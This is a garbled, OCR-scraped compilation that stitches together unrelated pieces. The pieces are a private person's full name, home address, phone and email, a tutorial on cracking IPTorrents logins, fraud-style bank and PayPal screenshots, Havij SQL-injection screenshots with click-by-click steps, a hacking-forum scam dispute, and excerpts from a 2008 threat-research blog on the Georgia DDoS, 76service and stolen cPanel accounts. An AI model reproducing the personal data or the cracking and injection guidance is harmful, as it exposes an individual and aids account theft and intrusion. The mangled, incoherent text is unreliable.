Huynh | Kieu Thanh Truc | Huynh Kieu Thanh Truc | 2211 LeesBorough Dr 
| Silver Spring | MD | 20902 | 240-893-0060 | thanhtruc@gmail.com 


Kieu Thanh Truc 

Huynh Kieu Thanh Truc 
2211 LeesBorough Dr 
Silver Spring 

MD 

20902 

240-893-0060 


thanhtruc@gmail.com 
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First Check Any site which you want to Crack. 
It support proxies or proxyless. 
Easy method is too check any Site just write anything in username and password and 


Enter again and again than you see if any site is With proxies it show you message like 
you ip banned or something like that, If it not show this message it mean its proxyless. 
My target is Iptorrents.com only For noobs and easy way to make your configs. 


17934 


@@000 T-Mobile LTE 1:49 PM @ 52% HL) 


=e 


Reason Deposit wasn't recorded 
correctly 


ATM deposit record 
Total: 170.00 


Your deposit details 


What is the 3600.00 
correct deposit 


°™#€Q:50303094 


Do you know Yes 
what bills were 
deposited? 


Bill amounts 
$100 X 36 = $3600 


Total $3600.00 


To the best of my knowledge, the 
information I am submitting is 
accurate and true. 
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thVPNBrate By M TSOfC. rack = x 


All-in-One VPN 


rows VPN 


Proxy And Threads Settings 


SOCKS4 


Account : 22242 Proxy : 6568 
Reamin : 244735 Error : $7849 
Baa: 12237 Bit: 5 


$649.00 
16GB" t 
$749.00 
64GB? vith 
$849.00 
128GB? t 


How much storage Is right for you? 


BUPTYalbHbie VM BbINENeHHbIe CepBepa j q 
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feet (SRAAL 


BUPTYa/IbHbie VU BbIQENEHHbIe CeEpBepa 


Bpemena Taxennie Hberve) 


mou KpyrocBeTKH No 50 AHElt OTOWWNH HEMHOFO Ha BTOPON NaH, c rpPaxnuamu Gena, NoTOMy NpencTasnaw Bam, 11 AHEBHOE nyTewecTBHe B MexcuKy, 
KoTOpoe Cofesut 8 ce6e Bcero 2 oTenn~, 
Mauwiity Ka MpoKar, 5 nepenéros (a He 28 Kak y mena OGbI4HO Opieaer) 


nna NpuneTeT B MexuKo cit, Yepes @parxdypT c Knesa, BSATD MawHHy - NpHEXaTb B KaHkyH Caenas no MexcuiKe oKono 2600 Ku noceusan 
BcAYeCKHe JOC TONPHNMeNaTeMHOC TH 
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:~# git clone https://github.com/HatBashBR/HatCLloud 
NOHMpoBaHMe B «HatCLloud»... 
remote: Counting objects: 40, done. 
remote: Compressing objects: 100% (18/18), done. 
remote: Total 40 (delta 22), reused 40 (delta 22), pack-reused 0 
PacnakoBkKa o6beKkTosB: 100% (40/40), rotToso. 
:~# cd HatCloud/ 
:~/HatCloud# ls -la 
ATOorO 60 
drwxr-xr-x 3 root root 4096 Map 15 15:11 
drwxr-xr-x 119 root root 4096 Map 15 15:11 .. 
rwxr-XIr-x 8 root root 4096 Map 15 15:11 .git 
-rw-r--r-- root root 1050 Map 15 15:11 .gitignore 
-rw-r--r-- root root 3300 Map 15 15:11 hatcloud.rb 
-rw-r--6r-- root root 35062 Map 15 15:11 LICENSE 
-rw-r--9r-- 1 root root 1582 Map 15 15:11 README.md 
:~/HatCLloud# chmod +x hatcloud.rb 
:~/HatCloud# ls -a 
-git  .gitignore LICENSE README.md 
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Kax nocTponte kapeepy 6 xuBepGesonacnoctu 


Tina nonywerwen mHornx Ceptucbuxatos TpeGyercs, 4TOGn! Boi yKe HMeNH ONPeRENeHHDIA ONbiT. 
STO OIHA4AET, 4TO Bb HE CMORETE NPOATH 9TH CePTHCDHKAaLIMM B CAMOM HAYANe CBOeR KApoepEi. 


CISSP ponxer Germ nepesim CepTucpyKaTOM, Ha KOTOpeN Bam CnenyeT HaLeNMTeCA B HANANe 
cecea Kappepe:. Nocne caaw ax3amena xa CISSP, » pexomernmyio Bam Chazy xe CAaTD 
ox3aMeH Ha CepTnd~at CISA, nocxonpxy 8 Hx MHOro OGwero MaTepHana # NerKo CnasaTD 
06a ax3amena Onve 3a Apyrum. Danee unet CISM., Jlanee apyrve cneunanvaaun, 


Auditor 
PCI QSA qualifications 


1 Pacumpennan AyanT BesonacnocTH 

1 ctumne Sosenscnece ISO 27001 lead auditor 

i CISSP - Certified Information Systems : 

' Security Professional CISA - Certified information Systems 
! 


1SO 27001 lead implementer 


Meneqxment besonacoctu / CISO 


CISM - Certified Information Security 
Manager 


MBA/Masters Degree in security 


CEH - Certified Ethical Hacker 
(CpenHni yposere) 
OSCP - Offensive Security Certified 
Professional 
(Mponsunyteit yposert) 
CREST for UK penetration testing 


Crest CRT, Crest CCT, CHECK, 
Tigerscheme - Check Team Member, 
Tigerscheme - Check Team Leader 


GPEN - GIAC Certified Penetration 


Security Architecture 
(HactorTenbHo pexomexn08aH) 


Test 
xf Cisco Security - CCNA Security 
GWAPT - GIAC Web Application (Havanese ypoeerm) 
Penetration Tester CCNP Security (Cpe) 


CCIE Security (SxcneprHe”) 


ee ee ee 


Cc ee eee ee ee ee ee ee 


21. http://blogs.zdnet.com/security/?p=153 

22. http://blogs.zdnet.com/security/?p= 

23. http://blogs.zdnet.com/security/?p=1538 

24. : : : i ?p=155 
?p=1562 

26. http://blogs.zdnet.com/security/?p= 

27. http://blogs.zdnet.com/security/?p=1598 

28. http://blogs .zdnet .com/security/?p=160 
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4.8.10 The Russia vs Georgia Cyber Attack (2008-08-11 22:05) 


ping: mfa.gov.ge 


result 
Florida, U.S.A. Okay 59.4 59).9 60.5 
Amsterdam, Netherlands Okay 149.3 164.6 275.4 
Melbourne, Australia Okay 173.8 174.5 175.0 
Singapore, Singapore Okay 208.5 214.0 238.6 
New York, U.S.A. Packets lost {100%) 
AmsterdamZ, Netherlands Packets lost (100%) 
Austinl, U.S.A. Packets lost (100%) 
London, United Kingdon Packets lost (100%) 
Stockholm, Sweden Packets lost (100%) 
Cologne, Germany Packets lost (100%) 
Chicago, U.S.A. Packets lost (100%) 
Austin, U.S.A. Packets lost (100%) 
4Amsterdam3, Netherlands Packets lost (100%) 
Krakow, Poland Packets lost (100%) 
Paris, France Packets lost (100%) 
Copenhagen, Denmark Packets lost (100%) 
San Francisco, U.S.A. Packets lost (100%) 
Vancouver, Canada Packets lost (100%) 
Madrid, Spain Packets lost (100%) 
Shanghai, China Packets lost (100%) 
Lille, France Packets lost (100%) 
Zurich, Switzerland Packets lost (100%) 
Munchen, Germany Packets lost (100%) 
Cagliari, Italy Packets lost (100%) 
Hong Kong, China Packets lost (100%) 
Johannesburg, South AfricaPackets lost (100%) 
Porto Alegre, Brazil Packets lost (100%) 
Sydney, Australia Packets lost (100%) 
Mumbai, India Packets lost (100%) 
Santa Clara, U.S.A. Packets lost (100%) 


Last month’s lone gunman [1]DDoS attack against Georgia President’s web site seemed like 
a signal shot for the cyber siege to come a week later. Here’s the complete coverage of 
the coordination phrase, the execution and the actual impact of the cyber attack so far - 
"[2]Coordinated Russia vs Georgia cyber attack in progress" : 


"Who's behind it? The infamous Russian Business Network, or literally every Russian 
supporting Russia’s actions? How coordinated and planned the cyber attack is, and do we 
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ee ee Pe " inte 


tT png nat 100. png eng nat 1 preg 


— Oe CHASE fo BUSINESS 


Accounts Pay & transfer Collect & deposit Account management 
Summary yun t 
= y SLL TI 
Mar 9.3 - 
PASSION AND CARING HOME AM ET 
$39,457.75 
Profile ett 
S t ° tat en “+. 
$24, 164.8 $ 


reer 
“yet 
Wore 


O $45.56 $0 Statements eee . Hotel Tonight 
=e 
10% back 5% back $75 back 
k 
Add ¢ ard Add to card Add {& ard 


$15,45 )f $15,451.06 $0.00 Statements | ++ 


- 
PF PayPal Money Transactions Customers Tools More av mt Log Out 


ana Peyment For Ari Irawan junaedi Remove trom archeve . $800.00 
40 AM ph wee  muhamenad ghyusela dweewtra Remove tro ° $800.00 v 
744 AM Payment F of jubus seenona Remove trom archeve - $200.00 uso 
aM Payment For Ving Yeung Remove fr - $400.00 
au Payment For Cahaya Abed Remove fr - 10.00 us 
24 AM Payment For Rafi Arian Remove trom archive ° $800 00 
aM Payment Fer Cahaya Abad Remove fror chive Md $300.00 
740 aM reseed Rafi Arian trom archeve - 10.00 uso 
737 aM Peywent For Rafi Arian Remove trom archeve - $20. 00u 
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actually have a relatively decent example of cyber warfare combining PSYOPs (psychological 
operations), and self-mobilization of the local Internet users by spreading “For our motherland, 
brothers!” or “Your country is calling you!” hacktivist messages across web forums. Let’s find 
out, in-depth. With the attacks originally starting to take place several weeks before the actual 
“intervention” with [3]Georgia President’s web site coming under DDoS attack from Russian 
hackers in July, followed by active discussions across the Russian web on whether or not DDoS 
attacks and web site defacements should in fact be taking place, which would inevitably come 
as a handy tool to be used against Russian from Western or Pro-Western journalists, the peak 
of [4]DDoS attack and the actual defacements started taking place as of Friday." 


Some of the tactics used : 

distributing a static list of targets, eliminate centralized coordination of the attack, engaging 
the average internet users, empower them with DoS tools; distributing lists of remotely SQL 
injectable Georgian sites; abusing public lists of email addresses of Georgian politicians for 
spamming and targeted attacks; destroy the adversary’s ability to communicate using the 
usual channels - Georgia’s most popular hacking portal is under DDoS attack from Russian 
hackers. 


Some of the parked domains acting as command and control servers for one of the bot- 
nets at 79.135.167.22 : 


79.135.167.22 
Overall Reputation: ae | Delisting: How do | clear my history? 
Good Neutral Bad 


ISP Location 


Benrapua Orc: 


Bulgaria —~ 


(Creer) 
e 


| PL razhie povdiv 


"Tepe (flneeguea) 


ma 
Gor 
L*% YA ag | 
- Bursa as Rast ot 
r (Bandiria nO L n ae ee 
Eski role Boss nice: © ae 
Sacer y sealed a : _Yozgat@ 
- - Polath 
pS aa, a x 


\\ ; = a I hs ee J ‘ 
~ ‘Somas 


13 @MWOB pacarsott bs Beene dikes, 1 Tele. Dee e hoes Use) 


emultrix .org 

yandexshit .com 

ad.yandexshit .com 
a-nahui-vse-zaebalo-v-pizdu .com 
killgay .com 

ns1.guagaga .net 

ns2.guagaga .net 

ohueli .net 
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11 Cecrew 11 Feedtecte and Comments | [ 


Werdcomee bach beythoncawnimen’s You Lent weit’ Todiey 07 8 Am 


[mt sare mers Fe SERENE RAAT FO Mw hee A Neen dina Tee cy ampere Shey ae a ed pe ear ny Aes TARY A 


peer ite 


AB mewnages cgreuned here mare the wean of the mutter on the oragrd power. amd are mot aed Weond not be there on cep rnentaner of te offid pore of far foram or 1 management or the ern of #2 tel It yom hive amy Garuhorm someiemt art 
seazyrviewe ple ae Wel tee te need Ore bediemmerey “Toren af Serene” ot Sams fmm wn smempbamtsite bemghor vem re 


Wekcomae tach, bevyihoncsansiinnns Yow lant wtattidt Tiny C808 AM tewp Ont 


Cute Veme Sent Lew] 
(een thee | mame ope 
4 memos ope 
1 emt es mee 
1 mentee age 
Mt ee 
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Vorkcomme tach, boyhoncaanimon Yow Last veut | ory 


fel SO PLY SCAM YOu sIcHT 


Rec SO THEY SCAM YOU FIGHT It 


‘Tom sopiied to then mumnnage town than 1 ewe apo 


ree 
week 
name Ont 4 
— 


Amey ters arvadmn > BYE 


Yes tee so you afremdy iinew about my scam tog abost MAR ght 
You brow fry protien eh ther right 


SO you paad then and mot recetved anvyth 
Pee 08 wondering HOW they accrpted your ponte 


You maade two ponts one in your thread and another on hamaccy thread saying that (hey are OAM and befing af wht but (re mondening aby (hey acrpted your pons ard ot banned pou 1 


ms trang 


I veewang Dhese bios cry Lolay ater Getertion AM 
hey'he not the on forum and they not browned ery exited posts 


fet bee 


Wetcomne bach, tevpdoncassiess. Yew Last wate Tatiy, On AM Leg Ont 


Re: CONTACT ME Ot MY ERA 


et CONTACT B48 One Mey EArt 


brorpctiosa anendirnons) Wretes 


Contact me on my cra = > boydonumemen@hgmal com << 


awe waved all the scrrennhots of the mewages me have eechanged and | mil post your scam report on my biog tomorow and sand you the mew Ink in your emai so you can post your comenents about 
that on ety bing, pent send me an cred anxd me wil get 9 contact fl! 


Let's get thes fucking bastards OOWN | 


Let's get thes fucking bantarcts DOWN | 
Uxpnte) 


os 
Pont mriten net by me 


Wetrome back, boydoucassines’ You last waited: Tedey, €30 AM tog Out 


+ 


fe Os THES A Ae err 


taryterne anemrss Wrest 


Hey bro, | aime pour pont in your hema i the excrow area weaving that HOR ma scam and that you didn? received amy money 
$0, are you realy tring the beth of pat yotung 7 

Heme you monhed the money ainmacdy or net 7 

Can you thow proct Ghat Guy ae Rat scameners oF you Rat poling ? 


WE aporerate f you Can Capen toy you Sand They are soars, Chands 


Yes they ane SCAMMERS. 

They wrote me about wore rorive Mut Sted pont and SCAM mewage note by me 
Come here through 12-16 hours and view this pont 

| mae at that Gime gm to HAN anc! lowe acomes to amy account 


Target |http://www.target.com/index.asp?id=123 > 8 


Anal 
D) Keyword: [ute Dete C1 Syntax: | Auto De pala 
Data Base: | Auto Detect y| Method: | Get v Type Auto Detect v © id 
Load Save 
Post Data: | 
7) mm E) a ® a ¥ & 
About Infa Table j 1 St / Find Admin MDS Settings 
Havij - Advanced SQL Injection Tool 
Version 1.14 Free 
- Copyright © 2009-2010 
By r3dm0v3 
http://ITSecTeam.com 
http: //forum.Itsecteam.com 
info@itsecteam.com Check for update 
Data Bases: 
MsSQL with error a 
MsSQL no error 
MsSQL Blind 
MsSQOL time based 
MsAccess 
MsAccess Blind v 
* Status: I'm IDLE Clear Log 


Havij 1.14 Free! 
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Target Tit; :// $I, procuctinfo._phpvid=217 
[]} Keyword: | 4 a ard = 
Data Base Auto Detect GET v Type Aute Detect 


Post Data: 


ee © s FT 


Find Adrn MDS Settings 


Havij - Advanced SQL Injection Tool 


Version 1.14 Free 
<>. Copyright © 2009-2010 
By r3dmOv3 
http: //1TSecTeam.com 


http: //forum.Itsecteam.com 
info@itsecteam.com Check for update 


Data Bases: 


MsSQL with error 
MsSQL no error 
MsSQL Blind 
MsSQL time based 
MsAccess 
MsAccess Blind 


© a 


Load Save 


pizdos .net 
googlecomaolcomyahoocomaboutcom.net 


Actual command and control locations : 
a-nahui-vse-zaebalo-v-pizdu .com/a/nahui/vse/zaebalo/v/pizdu/ 
prosto.pizdos .net/ _lol/ 


[5]Consider going through the complete coverage of what’s been happening during the 
weeked. Considering the combination of tactics used, unless the conflict gets solved, more 
attacks will definitely take place during the week. 


1, ftp: //blogs net. con/socurity/"p-1688 
2, hevp:/ blogs net .com/security/7p=1670 
3, http://blogs net. com/security/"p=1883 
4. 
5. 


ttp://www.telegraph.co.uk/news/worldnews/europe/georgia/2539157/Georgia-Russia-conducting-cyber-war .htm 


ttp://blogs.zdnet .com/security/?p=1670 


4.8.11 76Service - Cybercrime as a Service Going Mainstream (2008-08-13 11:01) 


Disintermediating the intermediaries in the cybercrime ecosystem, ultimately results in more 
profitable operations. Controversial to the concept of outsourcing, some cybercriminals are 
in fact so self-sufficient, that the stereotype of a mysterious 76service server offered for 
rent could in fact easily cease to exist in an ecosystem so vibrant that literally everyone can 
partition their botnet and start offering access to it on a multi-user basis. Evil? Obviously. 
Extending the lifecycle of a proprietary malware tool? Definitely. 


[1]The infamous 76service, a cybercrime as a service web interface where customers 
basically collect the final output out of the banking malware botnet during the specific period 
of time for which they’ve purchases access to the service, is going mainstream, with 76Ser- 
vice’s Spring Edition apparently leaking out, and cybercriminals enjoying its interoperability 
potential by introducing different banking trojans in their campaigns. 


1799 


(ace |p: ‘oro ductints ohprid=217 > om 
Analyze Patse 
C)Keywort [Auto Detect CJ Syntax | Auto Detect I 


Data Base: Auto Detect | Method: GET v Type: “Auto Detect | e ed 
————— ——— Load Save 


Post Data: 
1:First Click this. 2: Click This. 
73) & ¥ ss 


Query Find Admin MDS Settings 


& 1 a 


| Save Tables Save Data 


=) (] chinashogzonetm 
DO) yh 
DD wishist 
D usernto Now if the Server is 


( useracdiess exploited by Havij these 


D sitesetvice 
(0 :hoppingguide Tables will apear, Which 
ia may contain Sensitive 

a - 
FJ quolemessaze Information. 
CO prosize 
(0 propricedis 


cat (MySQL Only) [V]Al in one request. 


Finding string column 
Valid String Column is 3 
Target Vulnerable :D 
Current DOB: 


ES shew all cin 
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ICQ 66444488 


You've sent 20,00 $ USD to hn 


Go to Summary 


PayPal.Me, your link to getting paid 


Want to get paid faster? Share your 
PayPal.Me page with your customers so 
they can send payments to your PayPal 

account in seconds. 


Create Your Link 


hackingforum © [Ea *e 
_g_ Achim adamos <aiamosad1200@9m= com> 03:38 (44 16 horas) vr | | + 

para mim (=) 

Hi, iam AfadinOnStreet. 

I have alkeady lost access to my account. 

But they not edited my post. 

Here are my not edited post hitip:Mhackingforum wT 

25161525 1615 
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Welcome back, boydoscassinos5. You last visited: Today, 01:34 AM Log Out ~ 


Profile of AlladinOnStreet 


AlladinOnStreet 
(Junior Member) 


Registration Date: 10-05-2014 
Date of Birth: Not Specified 

Local Time: 12-17-2014 at 10:35 PM 
Status: Offline 


Jomed: 10-05-2014 
Last Visit: 57 minutes ago 


Total Posts: pie = per day | 0 percent of total posts) 


Total Threads: ; (0 threads 4 day | 0 percent of total threads) 


Time Spent Online: 11 Hours, 28 Minutes 
Members Referred: 


Reputation: 


& Sentry MEA 141 BETA 


ee Nee Nema GROREED COMMER SRD = 
F se nich Sa 
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In this post, I'll discuss the 76service’s spring.edition that has been combined with a 
[2]Metaphisher banking malware, an a popular [3]web malware exploitation kit, with two cam- 
paigns currently hosting 5.51GB of stolen banking data based on over 1 million compromised 
hosts 59 % of which are based in Russia. Screenshots courtesy of an egocentric underground 
show-off. 


[4]Some general info on the 76service : 


cy GoStats } . 
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®) bots” eaploie - ’ = 
Global stats | Rap. per tiene stats 
Country Rating Country Rating 

= ‘ a 

By uve Unt 
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"Subscribers could log in with their assigned user name and password any time during the 
30-day project. They’d be met with a screen that told them which of their bots was currently 
active, and a side bar of management options. For example, they could pull down the latest 
drops—data deposits that the Gozi-infected machines they subscribed to sent to the servers, 
like the 3.3 GB one Jackson had found. A project was like an investment portfolio. Individual 
Gozi-infected machines were like stocks and subscribers bought a group of them, betting they 
could gain enough personal information from their portfolio of infected machines to make 
a profit, mostly by turning around and selling credentials on the black market. (In some 
cases, subscribers would use a few of the credentials themselves). Some machines, like some 
stocks, would under perform and provide little private information. But others would land the 
subscriber a windfall of private data. The point was to subscribe to several infected machines 
to balance that risk, the way Wall Street fund managers invest in many stocks to offset losses 
in one company with gains in another." 
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The 76service empowers everyone who is either not willing to spend time and resources 
for building and maintaining a botnet, launching campaigns, and SQL injecting hundreds of 
thousands of sites in order to take advantage of the long tail of malware infected sites that 
theoretically can outpace the traffic that could come from a SQL injected high-profile site. 


Next to the spring.edition, [5]the winter edition’s price starts from $1000 and goes to 
$2000, which is all a matter of who you’re buying it from, unless of course you haven’t come 
across leaked copies : 


"Assuming that the dealer offering what he claimed was the 76service kit was correct, 
the profit is not only in the kit, but in selling value added services like exploitation, compro- 
mised servers/accounts, database configuration, and customization of the interface. Prices 
start between $1000 to $2000 and go up based on added services. The underground payment 
methods generally involve hard-to-track virtual currencies, whose central authority is in a 
jurisdiction where regulation is liberal to non-existent, and feature non-reversible transactions. 
The individual or group called "76service" was easy to track down on the Web, but not in 
person." 


Rename | Co 
2.tar 5.516 644 | Copy Jul 30 19:14 2008 apache apache 
Reset Ownership 


It’s interesting to monitor how services aiming to provide specific malicious services are verti- 
cally integrating by expanding their portfolio of related services - take a spamming vendor that 
will offer the segmented email databases, the advanced metrics, and the localization of the 
spam messages to different languages - or letting the buyer have full control of anything that 
comes out of a particular botnet for a specific period of time in which he has bought access to 
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it. For instance, DDoS for hire matured into botnet for hire, which evolved into today’s "What 
type of stolen data do you want?" for hire mentality I’m starting to see emerging, next to 


the usual interest in improving the metrics and thereby the probability for a more successful 
campaign. 
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Bot traffic Statistics for ukstories.net generated on 2006/03/21 
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Ironically, this cybercrime model is so efficient that the people behind it cannot seem to be 
able to process all of the stolen data, which like a great deal of underground assets loses 
its value if not sold as fast as possible. The result of this oversupply of stolen data are the 
increasing number of services selling raw logs segmented based on a particular country for a 
specific period of time. 
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Time for a remotely exploitable vulnerability in yet another malware kit about to go 
mainstream? Definitely, unless of course backdooring it and releasing it doesn’t achieve 
the obvious results of controlling someone else’s cybercrime ecosystem. 
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4.8.12 Who’s Behind the Georgia Cyber Attacks? (2008-08-14 14:38) 
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Of course the Klingons did it, or you were naive enough to even think for a second that 
Russians were behind it at the first place? Of the things | hate most, it’s lowering down the 
quality of the discussion | hate the most. Even if you’re excluding all the factual evidence 
([1]Coordinated Russia vs Georgia cyber attack in progress), common sense must prevail. 


Sometimes, the degree of incompetence can in fact be pretty entertaining, and greatly 
explains why certain countries are lacking behind others with years in their inability to 
understand the rules of information warfare, or the basic premise of unrestricted warfare, that 
there are no rules on how to achieve your objectives. 


So who’s behind the Georgia cyber attacks, encompassing of plain simple ping floods, 
web site defacements, to sustained DDoS attacks, which no matter the fact that Geogia has 
switched hosting location to the U.S remain ongoing? It’s [2]Russia’s self-mobilizing cyber 
militia, the product of a collectivist society having the capacity to wage cyber wars and literally 
dictating the rhythm in this space. What is militia anyway : 
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"civilians trained as soldiers but not part of the regular army; the entire body of physically fit 
civilians eligible by law for military service; a military force composed of ordinary citizens to 
provide defense, emergency law enforcement, or paramilitary service, in times of emergency; 
without being paid a regular salary or committed to a fixed term of service; an army of trained 
civilians, which may be an Official reserve army, called upon in time of need; the national 
police force of a country; the entire able-bodied population of a state; or a private force, not 
under government control; An army or paramilitary group comprised of citizens to serve in 
times of emergency" 


Next to the "blame the Russian Business Network for the lack of large scale implementa- 
tion of DNSSEC" mentality, certain news articles also try to wrongly imply that [3]there’s no 
Russian connection in these attacks, and that the attacks are not "state-sponsored", making it 
look like that there should be a considerable amount of investment made into these attacks, 
and that the Russian government has the final word on whether or not its DDoS capabilities 
empowered citizens should launch any attacks or not. In reality, the only thing the Russian gov- 
ernment was asking itself during these attacks was "why didn’t they start the attacks earlier?!". 


Thankfully, there are some visionary folks out there understanding the situation. Last 
year, | asked the following question - [4]What is the most realistic scenario on what exactly 
happened in the recent DDoS attacks aimed at Estonia, from your point of view? and some of 
the possible answers still fully apply in this situation : 
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- It was a Russian government-sponsored hacktivism, or shall we say a government-tolerated 
one 


- Too much media hype over a sustained ICMP flood, given the publicly obtained statis- 
tics of the network traffic 


- Certain individuals of the collectivist Russian society, botnet masters for instance, were 
automatically recruited based on a nationalism sentiments so that they basically forwarded 
some of their bandwidth to key web servers 


- In order to generate more noise, DIY DoS tools were distributed to the masses so that 
no one would ever know who's really behind the attacks 


- Don’t know who did it, but | can assure you my kid was playing !synflood at that time 


- Offended by the not so well coordinated removal of the Soviet statue, Russian oligarchs 
felt the need to send back a signal but naturally lacking any DDoS capabilities, basically 
outsourced the DDoS attacks 


- A foreign intelligence agency twisting the reality and engineering cyber warfare ten- 
sions did it, while taking advantage of the momentum and the overall public perception that 
noone else but the affected Russia could be behind the attacks 


- | hate scenario building, reminds me of my academic years, however, yours are pretty 
good which doesn’t necessarily mean | actually care who did it, and pssst - it’s not cyberwar, 
as in cyberwar you have two parties with virtual engagement points, in this case it was 
bandwidth domination by whoever did it over the other. A virtual shock and awe 


- | stopped following the news story by the time every reporter dubbed it the first cyber 
war, and started following it again when the word hacktivism started gaining popularity. So, 
hacktivists did it to virtually state their political preferences 


Departamental cyber warfare would never reach the flexibity state of people’s informa- 
tion warfare where everyone is a cyber warrior given he’s empowered with access to the right 
tools at a particular moment in time. 
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Despite the ongoing customerization of malware, and the malware coding for hire customer 
tailored services, certain malware authors still believe in the product concept, namely, they 
build it and wait for someone to come. In this underground proposition for a proprietary banker 
malware targeting primarily Brazillian bank, the author is relying on the localized value added 
to his malware forgetting a simply fact - that the most popular banker malware is generalizing 
E-banking transactions in such a way that it’s successfully able to hijack the sessions of banks 
it hasn’t originally be coded to target in general. 
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Taking into consideration the fact that not everyone would be willing to pay a couple of 
thousand dollars for a [1]banker malware kit targeting banks the customer isn’t interested in 
at the first place, malware authors have long been tailoring their propositions on the basis 
of modules. Adding an additional module for stealtness increases the prices, as well as an 
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In a truly globalized IT underground, Brazillian cybercriminals tend to prefer using the 
[2]market leading tools courtesy of Russian malware authors, so this localized banker malware 
with its basic session screenshot taking capabilities and accounting data logging has a very 
long way to go before it starts getting embraced by the local underground. 


Related posts: 

[3]The Twitter Malware Campaign Wants to Bank With You 
[4]Targeted Spamming of Bankers Malware 

[5]A Localized Bankers Malware Campaign 

[6]76Service - Cybercrime as a Service Going Mainstream 

[7]The Underground Economy's Supply of Goods and Services 
[8]The Dynamics of the Malware Industry - Proprietary Malware Tools 
[9]Using Market Forces to Disrupt Botnets 

[10]Multiple Firewalls Bypassing Verification on Demand 
[11]Managed Spamming Appliances - The Future of Soam 
[12]Localizing Cybercrime - Cultural Diversity on Demand 
[13]E-crime and Socioeconomic Factors 

[14]Malware as a Web Service 
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[16]Are Stolen Credit Card Details Getting Cheaper? 
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Checking Avatable Now $ 61,363,818 
On Deposit: $61,363,818 


Ye antes Som Leto Abmend Target Met cet (8OACE ty abe LON mre RAE mire DOA ken Gur Coed Pet get mS wkery buy ant gore Dem Meme 
DOR Une Mey Dow ght Dome Lorbng OF NOON ent De wEP BL ty item Wms Mterent secbon 

That sonteon enn? be pchted to Apher we el wiht mabe » notte gtan Khe MREe \ emgwr come Shes ang Hee had newer bewght ty tenty vow ont 
Nee ER aN eal i Se Epon EN Leggenl page Pm ME pA Latetinns A taggent 

‘And = yOu VOME NOON POW WHE ROO DOUNTS | LUggEEE # amy SOO! Got Bokd trom then page 


Rane an Aare 


we Oa nk ae tee By when LAtey pine SinT Beep piner medina! Late Prem oohOy 


Penne check pour Lmeroin Agdrens betere payout my 


Mey Mee ete meee 


18084 


© Download recent statements 


Congratulations, you reached 100% 


@ Enjoy our services 


FINANCIAL TOOL 
@ MY PFM 


@ FX Rates 


mat Ne ‘ 
a ”~ 
rg oe cy 


Seller's Terms ! 


ge View Your Services 


c Cc 


Verified by MasterCard. 
van SecureCode. 


Please submit your 
password 


Meri nent 
A 


_-ABHOE 
ADPECAT YBEAOMNEHUN 


YBefZOomnNeHnua O HOBbIX BXOfiax, CMCHaX MapOsin, 
6anaHce, UMNOpTe VU T.fl. MOTYT MPUXOAUTb Kak 
Bhafesbuy NaHe/u, Tak U APyYFOMy 4YeENOBeKy U/IV 
B Yat. 


4TOO6bI y3HaTb ID, AOCTATOUHO AO6aBuiTb 60Ta B 


WaT U BBECTU KOMaHAy 
/getid@hercules_fake_reporter_bot, nu6o Ty 
Ke KOMAHAY B Avanore Cc 6OTOM. 


@) | CBon chatid [96 
G) | Apyrou chatid: 


i =. lh 


18085 


18090 


Hawn tapudoi 


VPN 


1 MEHb 


MVHMMalbHbin 


ae 


# OpenVPN / L2TP / % OpenVPN / L2TP / 
PPTP PPTP 


Tpadux Tpaguk 


1 MECALL 17rog, 


npemuym 


py6nen / ron 
OpenVPN / L2TP / 


KOPNOTATUBHbIN 


TAPU® 


6e3 orpaHnueHuin 


3a geTanamu 


ow eBay FAST & FREE 


Estimated delivery Wednesday, 28. Jun. 2017 


Makita 
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4.8.15 Compromised Cpanel Accounts For Sale (2008-08-18 13:31) 
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|Z Cluster/Remote Access 
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Setup Remote Access Key gurdp 
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Server Information 
Service Status 
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a Account Information 


Search 
Show Account: 
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{ Pagel] 2 3 All) 
Create s New Account 
Lrnit Bandwidth Usage 
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Accounts 39 
Per Page: — 


Username © Reseller/Owner O Package 


Upgrade/Downgrade an Account 


&) Multi-Account Functions 
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Is the once popular in the second quarter of 2007, embedded malware tactic on the verge 
of irrelevance, and if so, what has contributed to its decline? Have SQL injections executed 
through botnets turned into the most efficient way to infect hundreds of thousands of legiti- 


mate web sites? Depends on who you’re dealing with. 


A cyber criminal’s position in the "underground food chain" can be easily tracked down 
on the basis of tools and tactics that he’s taking advantage of, in fact, some would on 
purposely misinform on what their actual capabilities are in order not to attract too much 
attention to their real ones, consisting of high-profile compromises at hundreds of high-profile 


web sites. 
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20:01 


2S) John 


Get help if you're filing for 
unemployment 


G3 YOUR DIRECT DEPOSIT ARRIVED! 


ACTIVATE YOUR CARD 


Received your card? Activate it now 


(~) Premium $1,634.58 


Checking 


Balance 


& Tinkoff Bank - $363.17 


oa Deposit from EAST IDAHO CU + $2,000 


C® Card Settings 
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software: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8b mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPa 
sys info: Linux n 2.6.18-92.eISPAE #1 SMP Tue Jun 10 19:22:41 EDT 2008 i686 
disabled 
id: uid=99(nobody) gid=99(nobody) groups=99(nobody) 
guid: 99 php pid: 28336 inode: 25067879 
perl: OFF curt: globals: OFF mysql: mssql: OF postgresqlL: OFF oracle: OF) safe-mode: 
drwxr-x--- 


hd: 159.43 GB of 194.38 GB (82.02%) 


name 


Embedded malware may not be as hot as it used to be in the last quarter of 2007, but 
thanks to the oversupply of stolen accounting data, certain individuals within the underground 
ecosystem seem to be abusing entire portfolios of domains on the basis of purchasing access 
to the compromised accounts. In fact, the oversupply of compromised Cpanel accounts is 
logically resulting in their decreasing price, with the sellers differentiating their propositions, 
and charging premium prices based on the site’s page ranks and traffic, measured through 
publicly available services, or through the internal statistics. 
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O solo me estas enviando fake info ypc, 5., yw 
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30.00 
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(V) Payment Successful! 
Thank you for shopping with us. An order confirmation email has been sent Seo 


Amount Paid: US$819.04 Payment Method: Credit or Debit Card 


© Send Receipt 
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SQL injections may be the tactic of choice for the time being, but as long as stolen accounting 
data consisting of Cpanel logins, and web shells access to misconfigured web servers remain 
desired underground goods, goold old fashioned embedded malware will continue taking place. 


Interestingly, from an economic perspective, the way the seller markets his goods, can 
greatly influence the way they get abused given he continues offering after-sale services 
and support. It’s blackhat search engine optimization | have in mind, sometimes the tac- 
tic of choice especially given its high liquidity in respect to monetizing the compromised access. 


The bottom line - for the time being, there’s a higher probability that your web proper- 
ties will get SQL injected, than IFRAME-ed, as it used to be half a year ago, and that’s because 
what used to be a situation where malicious parties would aim at launching a targeted attack 
at high profile site and abuse the huge traffic it receives, is today’s pragmatic reality where a 
couple of hundred low profile web sites can in fact return more traffic to the cyber criminals, 
